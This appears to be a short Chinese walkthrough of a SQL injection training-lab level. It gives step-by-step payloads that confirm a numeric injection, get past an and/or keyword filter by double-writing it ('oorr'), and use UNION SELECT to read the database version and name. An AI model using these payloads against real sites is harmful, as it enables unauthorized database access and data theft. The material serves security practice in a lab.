知识点:
- 数值型注入
- 双写绕过
- oorr
- anand
- 这里不能用错误注入(固定错误回显信息)
- 联合注入
测试发现跟25关好像一样,就是过滤了and or # 等东西
构造payload:id=1/0
发现成功运算了,这是一个数值型的注入
构造payload:id=1/0+oorr+1=1--+
成功显示了内容,可以尝试错误注入
构造payload:id=1/0+oorr+exp(710)=1--+
发现没有任何的回显信息,说明这里不能用错误注入
老方法,使用联合注入
构造payload:id=1/0+union+select+1,2,3+--+
成功回显了输入的内容
下面开始进行数据库名和版本的获取
构造payload:id=1/0+union+select+1,version(),database()+--+
成功获取了版本信息和数据库名
同理,可以获取数据库其他内容,这里不演示了,收工
10